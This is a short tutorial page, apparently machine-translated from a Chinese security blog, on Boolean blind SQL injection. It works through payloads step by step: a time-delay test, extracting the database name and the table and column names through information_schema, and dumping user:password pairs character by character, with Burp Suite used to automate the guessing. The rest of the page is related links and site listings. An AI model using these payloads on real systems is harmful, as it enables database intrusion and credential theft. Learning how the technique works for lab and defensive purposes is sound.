[Network Security] SQL Injection--Boolean Blind Injection - Code World

[Network Security] SQL Injection--Boolean Blind Injection

Language 2023-04-16 13:30:08 views: null

Boolean blind injection

Determine whether there is sql injection

input content

1' and sleep(5) --

There is a 5s delay in the return result, so there is a sql injection vulnerability

insert image description here

get database name

Instructions for use

if(1>2,1,0) # 判断条件是否成立。成立返回1，不成立返回0
substring('abcd',1,3)  #截取字符串第一位开始的三个字符

1. Determine the length of the database

1' and if(length(database())=4,1,0) --

2. Determine the database name

1' and if(substring(database(),2,1)='v',1,0) -- 
# 截取数据库的第一位判断是否为d

Burpsuite assists in cracking settings
insert image description here

3. Judgment table name

1' and if(substring((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1,1),1,1)='g',1,0) --

use burpsuite
insert image description here

4. Determine the column name

1' and if(substring((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' and TABLE_SCHEMA=database() limit 1,1),1,1)='l',1,0) --

5. Obtain account password

1'and if(substring((select CONCAT(user,0x3a,PASSWORD) from users limit 1),1,1)='a',1,0) --

Guess you like

Origin blog.csdn.net/qq_41158271/article/details/129983705

[Network Security] SQL Injection--Boolean Blind Injection

[Network Security] SQL Blind Injection? this one is enough

WEB Security SQL Injection <1> Blind Injection

sql injection learning - Boolean blind

SQL Boolean blind injection vulnerability

sql injection boolean based blind injection

【Website Architecture】How is the website system safe? Safety acceptance? Security, network security, SQL blind injection, https, authentication

SQL injection - blind and error injection

SQL injection-blind injection

SQL blind injection time injection

SQL Injection - Time Blind Injection

[Network Security] SQL Injection--Time Injection

[Network Security] SQL Injection--Error Injection

Blind SQL injection

SQL Injection（Blind）

sql blind injection function

Based on blind sql injection time

sql injection study - time blind

Application of dnslog in SQL blind injection

DVWA之SQL Injection (Blind)

DVWA——SQL Injection (Blind)(low)

Wireshark analyzes sql Boolean blind injection traffic packet

Network Security SQL Injection Actual Combat

[Network Security] Detailed Explanation of SQL Injection Vulnerabilities

[Network Security] Preliminary Exploration of SQL Injection Vulnerabilities

【Network Security】Detailed Explanation of SQL Injection

Boolean blind injection of sqlmap blasting

DVWA——SQL Injection Blind（SQL盲注）

MySQL Injection - Blind Injection - Time Blind Injection

Test platform based on SQL Pikachu injection - blind

Recommended

Rushing to the GitHub hot list——How can open source programming languages and frameworks be so cute?

Beijing Humanoid Robot Innovation Center launches Tiangong, the world's first full-size humanoid robot with purely electric drive for anthropomorphic running

Ranking

8个无需编写代码即可使用 Python 内置库的方法

Java collections interview knowledge Lite

Machine learning algorithms foundation - Introduction a (watermelon materials for the book)

(Easy) Ransom Note - LeetCode

[Five days] Qt from entry to actual combat: the second day

Remember once extremely pit father can not download Maven Jar package of issues: IDEA question

The minimum cost Shortest

OSPF study map (the most complete version)

Network Takeaways

GnuPG

Daily

More

2024-04-27(29)

2024-04-26(22)

2024-04-25(32)

2024-04-24(30)

2024-04-23(30)

2024-04-22(5)

2024-04-21(0)

2024-04-20(6)

2024-04-19(5)

2024-04-18(0)